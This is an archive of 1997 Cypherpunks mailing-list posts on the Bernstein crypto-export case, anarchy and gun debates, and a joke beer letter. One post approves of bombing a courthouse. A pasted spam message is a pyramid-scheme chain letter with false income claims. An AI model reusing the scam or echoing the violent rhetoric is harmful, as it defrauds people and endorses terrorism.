5.5 Bud Lite (silver can) 5.2 Ice House (blue and silver can) 4.4 Coors Lite (silver can) 4.1 Miller Genuine Draft (black can) 2.8 Coors (gold can) 0.1 It was evident that the color of the can directly correlates to the average suckpoint, except for Coors, which was pretty much determined to suck at any point. It is to be hoped that you will consider re-designing your MGD cans. All beer drinkers that are not smart enough to keep their beer in the shade will thank you. Sincerely, Bradley Lee Beer-drinker ___________________________________________________________ Dear Bradley Lee, Thank you for your letter and your concern about the MGD can color as it relates to premature warming of the contents. Like you, we at Miller Beer take beer drinking very seriously. To that end, we have taken your letter and subsequent experiment under serious consideration. Outlined below are our findings and solution to your problem. May we add that we have had similar letters from other loyal beer drinkers, mostly from the Southern United States. First, let us congratulate you on your findings. Our analysis tends to agree with yours regarding Coors. It certainly does suck at just about any temperature. Now, it was our intention when redesigning the MGD can to create better brand identity and brand loyalty. Someone in marketing did some kind of research and determined we needed to redesign the can. You will be pleased to know, we have fired that idiot and he is now wreaking havoc at a pro-gun-control beer manufacturer. The design staffer working in cahoots with the marketing idiot was also down-sized. However, once we realized this mistake, to undo it would have been even a bigger mistake. So, we took some other actions. From our market research, we found a difference between Northern beer drinkers and Southern beer drinkers. Beer drinkers in the South tend to drink slower than beer drinkers in the North. We are still researching why that is. Anyway, at Miller Beer, it was never our intention to have someone take more than 2.5 minutes to enjoy one of our beers. We pride ourselves in creating fine, smooth, quick-drinking beers and leave the making of sissy, slow-sipping beers to that Sam guy in Boston. However, it is good to know that you feel our Miller Lite can last as long as 6 minutes. However, may we suggest in the future you try consuming at least two in that time frame. >From your letter, we had our design staff work 'round the clock to come up with a solution that would help not just MGD but all our fine Miller products. We hope you have recently noticed our solution to your problem. We found that the hole in the top of the can was not big enough for quick consumption. So, we have now introduced the new "Wide Mouth" cans. We hope this will solve all your problems. Might I also suggest that if you want to get the beer out of the can even faster, you can poke a hole on the side near the bottom, hold your finger over it, open the can, tip it to your mouth and then pull your finger off the hole. This is a common way to drink beer at parties and impress your friends. This technique is known as "shot-gunning". You should like the name. Again, thank you for your letter and bringing to our attention that there might be other beer drinkers taking more than 2.5 minutes to drink our beers. Let me assure you that I am have our advertising department work on a campaign to solve this problem, too. Sincerely, Tom B. Miller Public Relations Miller Brewing Co. P.S. And remember, at Miller Beer we do favor gun control, too. So please use two hands when firing. -----End of forwarded message----- -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From gnu at toad.com Thu Aug 28 14:50:18 1997 From: gnu at toad.com (John Gilmore) Date: Thu, 28 Aug 1997 14:50:18 -0700 (PDT) Subject: US Seeks to Stay Bernstein Court Order Message-ID: <199708282144.OAA00603@toad.com> Forwarded-by: "--Todd Lappin-->" >From Wired News: http://www.wired.com/news/news/politics/story/6436.html US Seeks to Stay Court's Crypto Order by Rebecca Vesely 6:02pm 27.Aug.97.PDT The Justice Department is seeking an emergency stay of a ruling by a US District Court in San Francisco that granted a University of Illinois professor permission to export his encrypted email program. Judge Marilyn Hall Patel ruled in Bernstein v. Department of State that Daniel Bernstein can export his Snuffle program and make it available online without an export license. Her landmark ruling holds that software programs are literary works protected under the First Amendment. The Justice Department told Bernstein attorney Cindy Cohn on Wednesday afternoon that it will seek an emergency stay on the preliminary injunction allowing Bernstein to export Snuffle. The department is expected to file papers Wednesday night or Thursday morning, Cohn said. Justice officials were not immediately available for comment. "This is serious," Cohn said. "They feel that national security will be breached. But our opinion is that he has the right to publish his material." In what is called an ex parte emergency stay, the Justice Department asked Patel to reconsider her decision to grant a preliminary injunction. If Patel decides not to reverse her decision, the department can ask the 9th US Circuit Court of Appeals to override her decision. "It is unlikely Patel will give it to them," said John Gilmore, founding board member of the Electronic Frontier Foundation, which was a primary sponsor of Bernstein in the case. "If she does, we will continue with the appeal process and try to make the decision stick." The decision could affect not just the fate of Bernstein's research, but the US encryption export policy. Patel said in her decision that current export encryption regulations "are an unconstitutional prior restraint in violation of the First Amendment." Copyright =A9 1993-97 Wired Ventures Inc. and affiliated companies. All rights reserved. From kent at songbird.com Wed Aug 27 23:59:43 1997 From: kent at songbird.com (Kent Crispin) Date: Thu, 28 Aug 1997 14:59:43 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708271949.PAA23255@www.video-collage.com> Message-ID: <19970827235355.36892@bywater.songbird.com> On Wed, Aug 27, 1997 at 05:32:15PM -0400, William H. Geiger III wrote: [...] > > Both of your examples only go to prove the point of anarchy is better then > governments. Yes, in the same sense that you can say that unicorns are better than horses. But horses are real, and unicorns are imaginary. Unicorns have all the advantage -- we don't have to deal with unicorn shit. Governments are real, and anarchy is a utopian ideal, just like communism. [...] > In Germany, as in all mass murders, was the act of the *Governemnt*. > > No matter how you add the numbers up there has been many many more deaths > caused by governments than there ever has or will be by criminal. A meaningless assertion. Like saying "all people who die breathed air, therefore air is the cause of death". You say "guns don't murder people, people murder people", therefore it follows "Governments don't murder people, people murder people." Governments are instruments of people, not independent intelligent agents. You create this bogeyman, the *GOVERNMENT*, and blame everything on it. Now, you have identified the source of all evil. You imagine a fantasy hero, Anarchy, with its invincible magic sword, Cryptography, that can defeat the bogeyman. With this comforting theology you swagger down the cryptoanarchy dreamscape, your head filled with the rightness of your cause, and your righteous piece on your hip, ready to dispense sudden death to anyone who breaks your rules. A comforting dream, to be sure. But a dream. Government is a reality. All empirical evidence points to government being an inevitable part of the human condition. Anarchy is a fantasy. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From tcmay at got.net Thu Aug 28 01:31:19 1997 From: tcmay at got.net (Tim May) Date: Thu, 28 Aug 1997 16:31:19 +0800 Subject: Is this group dead? In-Reply-To: Message-ID: <199708280828.BAA02550@always.got.net> (A copy of this message has also been posted to the following newsgroups: alt.cypherpunks) In article , wiml at netcom.com (Wim Lewis) wrote: > In article <5togij$4he$1 at quixote.stanford.edu>, > Rich Graves wrote: > >No, nothing caused it. It's just dead, pretty much always has been. > >"Always" being only a few months, of course. > > Well, sure --- define "always" as "recently" and you won't see much > change. More than a couple months ago, it was non-dead (about ten relevant > articles a day on good days, IIRC). That's why I'm curious. > Some of us posted our articles to the Cypherpunks list(s) to this newsgroup, when it was first created. For my own part, this was partly to ensure propagation in case the new distributed mailing lists failed for some reason, and partly as a show of support for the new newsgroup, alt.cypherpunks. But alt.cypherpunks filled up with the usual spam and cross-posts. And the distributed mailing lists have done well. So most of us don't bother with it. If you or other readers are really interested, subscribe to the list. Newsgroups are just too prone to casual drop-ins, meaning, people who have no sense of history, no awareness of past issues already hashed out, etc. (Lest anyone think I'm being "undemocratic," sure. I cop to that. Anyone who wants to use alt.cypherpunks for discussions is free to. But if nobody does, so?) --Tim May -- There's something wrong when I'm a felon under an increasing number of laws. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Thu Aug 28 01:31:27 1997 From: tcmay at got.net (Tim May) Date: Thu, 28 Aug 1997 16:31:27 +0800 Subject: Suing gun makers? In-Reply-To: <199708280337.XAA03583@www.video-collage.com> Message-ID: At 10:09 PM -0700 8/27/97, Lucky Green wrote: >At 11:37 PM 8/27/97 -0400, Sean Roach wrote: >>I wasn't referring to when the things work improperly. I was referring to >>cases specifically like the lawsuit brought against the makers of the TEC-9 >>because some idiot used one on an office building full of people and it had >>the odassity to work. > >Actually, it didn't work. The TEC-9 is such a lousy gun, it jammed >immediately. The killer dispatched all his victim with his backup 45. Not >that the pro-victimization lobby would care much about the facts. > Are you sure about this, Lucky? I've fired a Tec-9 at the range, and if functioned OK...just a standard, stamped-metal, 9 that fires from an open bolt. Any jams, if they occurred, could be cleared easily, probably faster than a shooter could drop it and replace it with his sidearm. And just which case are you guys both apparently talking about (without actually saying so). The Market Street shooting in SF a few years ago? I recall hearing that the shooter's victims were suing the gun makers, the gun stores, the building owners, the city of San Francisco, and probably the Sanitation Department. Emotional loss can make people do all sorts of wrong things. But their suits should have been dismissed immediately, on a matter of law. Was it? I never heard the outcome. If they won, then the courthouse in which this happened should be McVeighed. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dformosa at st.nepean.uws.edu.au Thu Aug 28 02:08:10 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Thu, 28 Aug 1997 17:08:10 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708270818.JAA01014@server.test.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 27 Aug 1997, Adam Back wrote: [...] > If one person becomes too much of a nuisance (real trigger happy for > ultra minor infractions [...] relatives, friends, or concerned citizens > will correct (fill trigger happy person with lead). Dosn't help the poor person who got shot dose it? Am I mad to beleave that getting killed is a reduction of basic civil liberties? > That's how the wild west worked anyway... outlaws didn't last that > long. Nor did the wild west. > So you're relying on other peoples sense of fairness ... should easily > work out better than governments. So I am relying on peaple basicly being fair. On that ground we might as well have no laws because everybody will just act fairly. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNAUB7KQK0ynCmdStAQG4zwQAu+TVZoq8V7/4OBmCH1l/XHwApNx5OYOK CJi4RlC5Q+8QeLDGwy/GZWhS1/yEseuAeeTFlyVKcjaJB2PJTi3+NGYYhFhwNO7z Vf7gV/TQ9yF/WFPnKlbr5JzfpotRG6/tzev/9Rq6VYEdlGOQT5ZF6D/4Qi7Bcjqu uQh3s82FJ9g= =i5ns -----END PGP SIGNATURE----- From 67396928 at 11225.com Thu Aug 28 17:20:03 1997 From: 67396928 at 11225.com (67396928 at 11225.com) Date: Thu, 28 Aug 1997 17:20:03 -0700 (PDT) Subject: Internet Bliss!!!! Message-ID: <9754658 15478DCD98652@upttown494.com> MY AMAZING STORY CAN CHANGE YOUR LIFE AS IT CHANGED MINE!!! JUST READ IT! YOU'VE SEEN IT OVER AND OVER.... IF You keep receiving this email.... IT MUST WORK!! WILL THIS BE THE TIME YOU TAKE THAT STEP??? ************************************************************************ Print This email Now For Future Reference Deleting this email is like throwing out a winning lottery ticket. Take 2 minutes to read it. Then decide!!! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Dear Friend, I am 27, and had received this offer 6 times before I gave it a shot. I'm not going to say that I was in debt, down on my luck, sick and couldn't pay the rent when this fantastic order came along. Things were fine. In fact, I'm an IVY League graduate and was doing very well in my career and I never gave any email money making opportunities a chance. Finally I figured, "Hey it will be IMPOSSIBLE to lose any money, so why not give it a shot... Was risking $20 worth the chance of making $50,000?" 78 days later (today), and I have made exactly 79,835.00 The crazy part is how EASY it has been!!! No meetings, phone calls. In fact, I didn't have to talk with anyone!!. Just needed a computer and email!! Obviously from the condition of this email, I don't even know much about computers. That's the beauty of it. Anyone can do it. This program is a proven mathematical formula. A PROVEN MATHEMATICAL FORMULA!! This electronic multi-level marketing program works perfectly...100% EVERY TIME! Just follow the instructions (YOU CANT LOSE) and enjoy, enjoy, enjoy, and then spend spend spend!!! p.s. This program promises $50,000 profit. I am well on my way to $100,000 and shooting for $150,000.00!! Good Luck!!! God Bless... Remeber to drop me a note. Can't wait to hear from you!!!! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ You are about to make at least $50,000 in less than 90 days! Have you received this offer from someone else and deleted the message?? I DELETED THIS OPPORTUNITY 6 TIMES BEFORE GETTING INVOLVED!!! OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC MULTI-LEVEL MARKETING PROGRAM Basically, this is what we do: We sell thousands of people a product for $5.00 that costs us next to nothing to produce and e-mail. As with all multi-level businesses, we build our business by recruiting new partners and selling our products. Every state in the U.S. allows you to recruit new multi- level business online (with your computer). The product in this program is a series of four business and financial reports. After you get started, people will order these reports from you. Each $5.00 order you receive will include the e-mail address of the sender or a self addressed envelope of the sender. To fill each order, you simply e-mail the product to the buyer or mail it off. THAT'S IT!...the $5.00 is yours! This is the GREATEST electronic multi-level marketing business anywhere! Here are the simple instructions and details on how to get 10,000 orders at minimum. Send me a note sometime soon sharing your good fortunes!!! FOLLOW THE INSTRUCTIONS EXACTLY! THE PROFITS ARE TREMENDOUS!!! Remember the 4 points below and we'll see YOU at the top! ******* I N S T R U C T I O N S ******* This is what you MUST do: 1. Order all 4 reports listed and numbered from the list below. For each report send $5.00 CASH, A SELF ADDRESSED STAMPED BUSINESS ENVELOPE, OR YOUR E-MAIL ADDRESS and YOUR RETURN POSTAL ADDRESS (in case of a problem) to each person listed below. When you order, make sure you request each SPECIFIC report. You will need all four reports, because you will be reselling them and making big $$$. 2. Replace the name and address under REPORT #1 (THAT'S ME!) with your name and address, moving my name and address under REPORT #2. Move the name and address under REPORT #2 to under REPORT #3. Move the name and address under REPORT #3 to under REPORT #4. The name and address that was under REPORT #4 is dropped off the list and undoubtly is counting $50,000. IMPORTANT--DO NOT alter the names and addresses below, or their sequence other than instructed in this program! Or you will not profit the way you should. When doing this, please make certain you copy everyone's name and address ACCURATELY!!! 3. Take this entire program text, including the corrected names list, and save it on your computer. 4. Now you're ready to start a massive advertising campaign on the WORLDWIDE WEB! Advertising on the WEB is very, very inexpensive, but there are HUNDREDS of FREE places to advertise also. Another avenue which you could use is e-mail mailing lists. You can buy these lists for under $20/20,000 addresses. START sending this email to thousands of people. The sooner you do. The sooner you will start to receive orders. REQUIRED REPORTS ***Order each REPORT by NUMBER and NAME*** ALWAYS SEND $5 CASH (Concealed) FOR EACH ORDER REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER. ALWAYS SEND FIRST CLASS OR PRIORITY MAIL AND PROVIDE A SELF ADDRESSED ENVELOPE AND YOUR E-MAIL ADDRESS FOR QUICK DELIVERY. ______________________________________________________________________ REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" ORDER REPORT #1 FROM: SUCCESS AA MARKETING Suite 130 This is my address 222 Main Street Your name and adress goes here now Annapolis, MD 21401 Put my name and addess under number 2 Number 2 goes to 3, and 3 goes to 4! ______________________________________________________________________ REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES" ORDER REPORT #2 FROM: KAW Marketing AA P.O. Box 139 1009 Bay Ridge Avenue Annapolis, MD 21403 ______________________________________________________________________ REPORT #3 "SOURCES FOR THE BEST MAILING LISTS" ORDER REPORT #3 FROM: R. C. 3 McCarthy Court Farmingdale, NY 11735 ______________________________________________________________________ REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS" ORDER REPORT #4 FROM: Big G 151 Hillside Road Farmingdale, NY 11735 ______________________________________________________________________ .............................................................................................................................. HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$ Let's say you decide to start small just to see how it goes. Assume your goal is to get 10 people to participate on your first level. (Placing a lot of FREE ads on the internet could EASILY get a better response.) Also assume that everyone else you recruit gets ONLY 10 downline members. Follow this example for the STAGGERING results below. 1st level--your 10 members pay you $5 $50 2nd level-- those 10 members get 10 more (100 X $5) $500 3rd level-- those 100 members get 10 more (1000 X $5) $5,000 4th level-- those 1,000 get 10 more each (10,000 X $5) $50,000 THIS TOTALS-----------> $55,550 Do you see how easy this is? After you send out this same E Mail, your new recruits will order REPORT # 1 from you and move your name and address to #2. Their recruits will order REPORT # 2 from you and move your name and address to number 3. That group of recruits will order REPORT # 3 from you (a minimum of 1000 of $5 orders will come your way!) and move your name and address to number 4. That group will order 10,000 copies of report #4 from you, AT MINIMUM!! Remember friends, this is assuming that the people who participate only recruit 10 people each. Dare to think for a moment what would happen if everyone got 20 people to participate! Some people get 100's of recruits! THINK ABOUT IT! By the 3rd and 4th level, your address will be on hundreds of thousands of emails. Everyone of them wants to make money. Every one has $5.00. By the way, your cost to participate in this is practically nothing.You obviously already have an internet connection and email is FREE!!! REPORT#3 will show you the best methods for bulk emailing and purchasing email lists. REMEMBER: Approx. 50,000 new people get online monthly! ORDER YOUR REPORTS NOW!!! It's so easy to listen to the critics who say Don't Do It. Those people will never be successful. Smile... and Enjoy! *******YOUR SUCCESS GUIDELINE******* The check point that guarantees your success is simply this: You MUST receive 10 to 20 orders for REPORT #1! THIS IS A MUST! If you don't within two weeks, advertise more and send out more programs until you do. Then, a couple of weeks later you should receive at least 100 orders for REPORT #2. If you don't, advertise more and send out more programs until you do. Once you have received 100, or more orders for REPORT #2, YOU CAN RELAX, because you will be on your way to the BANK! -OR- You can DOUBLE your efforts! REMEMBER: Every time your name is moved down on the list you are in front of a DIFFERENT report, so you can KEEP TRACK of your PROGRESS by watching what report people are ordering from you. IT'S THAT EASY!!! ******* T E S T I M O N I A L S ******* This program does work, but you must follow it EXACTLY! Especially the rule of not trying to place your name in a different position, it won't work, you'll lose a lot of money. I'm living proof that it works. It really is a great opportunity to make relatively easy money, with little cost to you. If you do choose to participate, follow the program exactly, and you'll be on your way to financial security. If you are a fellow Christian and are in financial trouble like I was, consider this a sign. I DID! Good Luck & God Bless You, Sincerely, Chris Johnson P.S. Do you have any idea what 11,700 $5 bills ($58,500) looks like piled up on the kitchen table?...IT'S AWESOME! My name is Frank. My wife Doris and I live in Bel-Air, MD. I am a cost accountant with a major U.S. Corporation and I make pretty good money. When I received the program I grumbled to Doris about receiving "junk mail"! I made fun of the whole thing, spouting my knowledge of the population and percentages involved. I "knew" it wouldn't work. Doris totally ignored my supposed intelligence and jumped in with both feet. I made merciless fun of her, and was ready to lay the old "I told you so" on her when the thing didn't work... well, the laugh was on me! Within two weeks she had received over 50 responses. Within 45 days she had received over $147,200 in $5 bills! I was stunned. I was sure that I had it all figured and that it wouldn't work...I AM a believer now. I have joined Doris in her "little" hobby. I did have seven more years until retirement, but I think of the "rat race" and it's not for me.... Frank T., Bel-Air, MD I just want to pass along my best wishes and encouragement to you. Any doubts you have will vanish when your first orders come in. I even checked with the U.S. Post Office to verify that the plan was legal. It definitely is! IT WORKS!!! Paul Johnson, Raleigh, NC This is the only realistic money-making offer I've ever received. I participated because this plan truly makes sense. I was surprised when the $5.00 bills started filling my mail box. By the time it tapered off I had received over 8,000 orders with over $40,000 in cash. Dozens of people have sent warm personal notes too, sharing the news of their good fortunes! It's been WONDERFUL. Carl Wittow Tulsa, OK The main reason for this letter is to convince you that this system is honest, lawful, extremely profitable, and is a way to get a large amount of money in a short time. I was approached several times before I checked this out. I joined just to see what one could expect in return for the minimal effort and money required. Initially I let no one in the organization know that I was an attorney and, to my astonishment, I received $36,470.00 in the first 14 weeks, with money still coming in. Sincerely yours, Phillip A. Brown This plan works like GANG-BUSTERS!!! So far I have had 9,735 total orders...OVER $48,000!!! I hope I have sparked your own excitement, if you follow the program exactly, you could have the same success I have, if not better. Your success is right around the corner, but you must do a little work. Good Luck! G. Bank Not being the gambling type, it took me several weeks to make up my mind to participate in this plan. But conservative that I am I decided that the initial investment was so little that there was just no way that I wouldn't get enough orders to at least get my money back. Boy I was surprised when I found my medium-size post office box crammed with orders. After that it got so over-loaded that I had to start picking up my mail at the window. I'll make more money this year than any 10 years of my life before. The nice thing about this deal is that it doesn't matter where in the U.S. the people live. There simply isn't a better investment with a faster return. Mary Rockland, Lansing, MI I had received this program before. I deleted it, but later I wondered if I shouldn't have given it a try. Of course, I had no idea who to contact to get another copy, so I had to wait until I was e-mailed another program...11 months passed then it came...I didn't delete this one!...I made $41,000 on the first try!! D. Wilburn, Muncie, IN This is my third time to participate in this plan. We have quit our jobs, and quite soon we will buy a home on the beach and live off the interest on our money. The only way on earth that this plan will work for you is if you do it. For your sake, and for your family's sake don't pass up this golden opportunity. Good luck and happy spending! Charles Fairchild, Spokane, WA Typically when I look at a money-making deal I want to know if the company is strong, will it be here when it's time for my big pay off. In this crazy thing there is no company intervention for management to blow it. Just people like me ordering directly from the source! Interesting...I had a couple of projects I'd been trying to fund to no avail so I thought; Why not give it a try? Well 2 1/2 weeks later the orders started coming in. One project is funded and I'm sure the other will be soon! Marilynn St. Claire, Logan, UT READ THIS AGAIN, AND AGAIN. PRINT IT. ITS NOT TOO GOOD TO BE TRUE. EMAIL ME OR DROP ME A NOTE AFTER YOU'VE MADE YOUR 50 GRAND. ITS AN AMAZING FEELING!!!! =============================================================== *******TIPS FOR SUCCESS******* TREAT THIS AS YOUR BUSINESS! Send for the four reports IMMEDIATELY Be patient and persistent with this program. If you follow the instructions exactly the results WILL undoubtedly be SUCCESS! * ABOVE ALL, HAVE FAITH IN YOURSELF THAT YOU CAN SUCCEED! When you receive a $5 order, you MUST send out the requested product/report to comply with the U.S. Postal & Lottery Laws, Title 18,Sections 1302 and 1341 or Title 18, Section 3005 in the U.S. Code,also Code of Federal Regs. vol. 16, Sections 255 and 436, which state that "a product or service must be exchanged for money received." * ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE. NOTE: IF YOU NEED HELP with starting a business, registering a business name, how income tax is handled, etc., contact your local office of the Small Business Administration (a Federal agency) for free help and answers to questions. Also, the Internal Revenue Service offers free help via telephone and free seminars about business taxes. =============================================================== From Cindy at mcglashan.com Thu Aug 28 18:30:38 1997 From: Cindy at mcglashan.com (Cindy Cohn) Date: Thu, 28 Aug 1997 18:30:38 -0700 (PDT) Subject: Stay issued; modified stay to follow Message-ID: <199708290123.SAA24903@gw.quake.net> During a conference call with counsel today, Judge Patel issued a stay of the injunctive relief issued in her Opinion of August 25, 1997, effective until September 8. On September 8 (or sooner if we get the papers to her) the Court she will issue a formal Stay Pending Appeal which will stay the injunctive relief issued in her Opinion of August 25, 1997, except that an injunction shall be reinstated to prevent the prosecution of Professor Bernstein for the "unlicensed export" of Snuffle 5.0 (which includes Snuffle and Unsnuffle) and any later versions of that program which he has developed. This eliminates, at least for the meantime, the injunctive relief granted to Bernstein as to any other computer programs which he may have developed or otherwise wished to publish. It also eliminates the protections for persons other than Professor Bernstein. The government has said that it may still challenge this more limited stay in the 9th Circuit. Professor Bernstein may also seek relief from the stay from the 9th Circuit. Cindy ************************ Cindy A. Cohn McGlashan & Sarrail, P. C. 177 Bovet Road, 6th Floor San Mateo, CA 94402 (415) 341-2585 (tel) (415)341-1395 (fax) Cindy at McGlashan.com http://www.McGlashan.com From bcr1 at shirenet.com Thu Aug 28 19:13:32 1997 From: bcr1 at shirenet.com (Bob Corn-Revere) Date: Thu, 28 Aug 1997 19:13:32 -0700 (PDT) Subject: Stay issued; modified stay to follow In-Reply-To: <199708290123.SAA24903@gw.quake.net> Message-ID: <34062E62.17C4@shirenet.com> What a drag. I guess we had better get the word out. I heard that someone had already posted some code to a Counsel Connect discussion group. Bob From isparkes at q9f47.dmst02.telekom.de Thu Aug 28 04:57:39 1997 From: isparkes at q9f47.dmst02.telekom.de (Ian Sparkes) Date: Thu, 28 Aug 1997 19:57:39 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708270818.JAA01014@server.test.net> Message-ID: <3.0.2.32.19970828132620.0069833c@q9f47.dmst02.telekom.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 At 14:43 28.08.97 +1000, you wrote: >On Wed, 27 Aug 1997, Adam Back wrote: > >[...] > >> If one person becomes too much of a nuisance (real trigger happy for >> ultra minor infractions [...] relatives, friends, or concerned citizens >> will correct (fill trigger happy person with lead). > >Dosn't help the poor person who got shot dose it? Am I mad to beleave >that getting killed is a reduction of basic civil liberties? > >> That's how the wild west worked anyway... outlaws didn't last that >> long. > >Nor did the wild west. > And nor the innconent bystanders. The 'you pissed me off - bang bang you're dead' mentality was the reason for one of the largest genocides in human history. >> So you're relying on other peoples sense of fairness ... should easily >> work out better than governments. > >So I am relying on peaple basicly being fair. On that ground we might as >well have no laws because everybody will just act fairly. > People, and indeed all animals, are inherently selfish. That's life. -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNAVSTPzOjjBJiFUeEQLpTACfacI9DbWPxPn8q/4S59Rz1nasYCUAoKXW oWYBNaVqLlZi8ATJQLO0sT1X =CQT/ -----END PGP SIGNATURE----- From MAILER-DAEMON at bayonet.sjmercury.com Thu Aug 28 20:59:23 1997 From: MAILER-DAEMON at bayonet.sjmercury.com (Mail Delivery Subsystem) Date: Thu, 28 Aug 1997 20:59:23 -0700 (PDT) Subject: Returned mail: Remote protocol error Message-ID: <9708290347.AA05394@bayonet.sjmercury.com> ----- Transcript of session follows ----- 554 ... Remote protocol error ----- Unsent message follows ----- Received: by bayonet.sjmercury.com; id AA03901; Thu, 28 Aug 97 20:34:03 PDT Received: from mailspool.sjmercury.com(192.30.148.20) by bayonet.sjmercury.com via smap (3.2) id xma003851; Thu, 28 Aug 97 20:33:38 -0700 Received: from bayonet.sjmercury.com by sjmercury.com (SMI-8.6/SMI-SVR4) id UAA08381; Thu, 28 Aug 1997 20:34:13 -0700 Received: by bayonet.sjmercury.com; id AA03843; Thu, 28 Aug 97 20:33:32 PDT Received: from wombat.sk.sympatico.ca(142.165.5.136) by bayonet.sjmercury.com via smap (3.2) id xma003833; Thu, 28 Aug 97 20:33:23 -0700 Received: from default (orenco33.sk.sympatico.ca [142.165.99.33]) by wombat.sk.sympatico.ca with SMTP (8.7.1/8.7.1) id VAA28468; Thu, 28 Aug 1997 21:34:33 -0600 (CST) Message-Id: <3406440E.724F at toad.com> Date: Thu, 28 Aug 1997 21:37:50 -0600 From: Cypherpunks Mailing List Reply-To: cypherpunks at toad.com X-Mailer: Mozilla 3.01C-SYMPA (Win95; U) Mime-Version: 1.0 To: Cindy Cohn Cc: sadams at forbes.com, telstar at wired.com, plotnikoff at aol.com, Ewasserman at sjmercury.com, dang at cnet.com, steven at echo.net, abate at ccnet.com, wendyg at cix.compulink.co.uk, amy at netcom.com, courtm at cnet.com, alan.boyle at MSNBC.COM, declan at well.com, sep at cbsnews.com, kenc at cwi.emap.com, arb at well.com, exp at mk.ibek.com, bransten at interactive.wsj.com, TomBemis at pacbell.net, sam.perry at reuters.com, jimevans at aol.com, ljflynn at aol.com, wendyl at ljx.com, bernstein-announce at toad.com Subject: Sit, Bubu. Sit! / Re: Stay issued; modified stay to follow References: <199708290123.SAA24903 at gw.quake.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Cindy Cohn wrote: > > During a conference call with counsel today, Judge Patel issued a stay of > the injunctive relief issued in her Opinion of August 25, 1997, effective > until September 8. Why are these dinosaurs fucking away perfectly good taxpayer's money trying to shore up the walls of a crumbling civilization? NEWS FLASH!!! THE GENIE *WON'T* GO BACK IN THE BOTTLE --------------------------------------- Before the ink had dried on Judge Patel's ruling, 2,000,000 emails of Professor Bernstein's work were on their way overseas, to every port of call. (Courtesy of Email Blaster, that wonderful progam that tells us, fifty times a day, how to "MAKE MONEY FA$T!!!") > On September 8 (or sooner if we get the papers to her) the Court she will > issue a formal Stay Pending Appeal which will stay the injunctive relief > issued in her Opinion of August 25, 1997, except that an injunction shall be > reinstated to prevent the prosecution of Professor Bernstein for the > "unlicensed export" of Snuffle 5.0 (which includes Snuffle and Unsnuffle) > and any later versions of that program which he has developed. Hell, Professor Bernstein can _import_ it now! By September 8, the program will be obsolete, having been tweaked upward a few generations by Iraquian programmers. I respectfully requested that the Iraquis make any future versions of the program available to American youth who have to flee to Hitler's homeland with their website in order to avoid being persecuted for their sexual predeliction. {See - http://www.guidemag.com/newsslant/vigilante-censors.html } > This eliminates, at least for the meantime, the injunctive relief granted to > Bernstein as to any other computer programs which he may have developed or > otherwise wished to publish. It also eliminates the protections for persons > other than Professor Bernstein. No it doesn't. Haven't you heard of strong crypto? Thank you for pointing out that Phil Zimmerman wishes to protect me, and Judge Patel wishes, on behalf of the government, to "eliminate the protections" which strong encryptions affords me. The governement can't even protect themself, let alone the citizens, as evidenced by the fact that the current sport of teenage hackers across the nation is to send strong encryption overseas by way of the government's email systems. (Can you say FBI? Sure you can! Can you say IRS? Sure you can!) Yet these dweebs want to destroy an industry that *is* capable of providing the citizens protection? (Considering the INSLAW affair, perhaps it would be more fitting to say "destroy _another_ industry.") > The government has said that it may still challenge this more limited stay > in the 9th Circuit. Professor Bernstein may also seek relief from the stay > from the 9th Circuit. I hope these idiots are having fun and making lots of money playing their dinosaur games, because they are certainly accomplishing the opposite of what they claim to be trying to do. The most that the dinosaurs in D.C. can manage to do, is to drag all of the American business interests down into the ashes of history with them as they attempt to build an Electromagnetic Curtain behind which to imprison their citizens. Well, the CypherPunks were digging tunnels before the government even knew they were predestined to build the Wall, so the fascist censors are sucking hind-tit and will, in all likelihood, continue to do so. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ TruthMonger, CoE Official Spokesperson for: Cypherpunks Cult of One, DoWell, Saskatchewan Division "Give me bandwidth, or give me death." -Admiral B. d'Shauneaux "The 